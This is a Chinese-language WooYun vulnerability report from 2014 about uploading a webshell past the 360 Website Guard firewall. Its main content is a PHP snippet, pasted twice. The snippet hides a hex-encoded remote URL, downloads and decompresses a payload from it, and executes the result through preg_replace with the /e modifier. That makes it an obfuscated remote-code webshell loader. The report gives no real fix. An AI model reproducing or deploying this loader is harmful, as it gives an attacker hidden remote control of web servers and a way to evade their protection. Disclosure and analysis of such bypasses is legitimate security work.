[公开漏洞]绕过360网站卫士上传大马(Webshell) - 漏洞预警

绕过360网站卫士上传大马(Webshell) 相关厂商：奇虎360 漏洞作者：蓝莓说提交时间：2014-03-18 10:40 公开时间：2014-05-02 10:41 漏洞类型：设计缺陷/逻辑错误危害等级：中自评Rank：10 漏洞状态：厂商已经确认漏洞来源：http://www.wooyun.org Tags标签：上传绕过防护漏洞详情披露状态：

2014-03-18：细节已通知厂商并且等待厂商处理中
2014-03-18：厂商已经确认，细节仅向厂商公开
2014-03-28：细节向核心白帽子及相关领域专家公开
2014-04-07：细节向普通白帽子公开
2014-04-17：细节向实习白帽子公开
2014-05-02：细节向公众公开

简要描述：

绕过360网站卫士上传大马最近最近写的脚本

详细说明：

漏洞证明：这个是被杀的

@47~T7M`OAJ)F`VH1LQXMGK.jpg

9I~T7L4UCV1FU[9NQ6Z]]ZW.jpg

下一个给你看没有被杀：

00P)1I}20_L2Y0LE6(ROZBD.jpg

X]C[2%V0(HQ[HC5T36J[SR2.jpg

你看吧我没做加我写的代码贴出来：

<?php

error_reporting(0);session_start();header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649);@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);

?>

你们解决我吃饭去了

漏洞证明：

漏洞证明：这个是被杀的

@47~T7M`OAJ)F`VH1LQXMGK.jpg

9I~T7L4UCV1FU[9NQ6Z]]ZW.jpg

下一个给你看没有被杀：

00P)1I}20_L2Y0LE6(ROZBD.jpg

X]C[2%V0(HQ[HC5T36J[SR2.jpg

你看吧我没做加我写的代码贴出来：

<?php

error_reporting(0);session_start();header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649);@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);

?>

QNJG419N$(`$7]LDI{](J{6.jpg

你们解决我吃饭去了

修复方案：

你懂得

危害等级：高

漏洞Rank：15

确认时间：2014-03-18 17:57

厂商回复：

非常感谢您对360网站卫士的关注！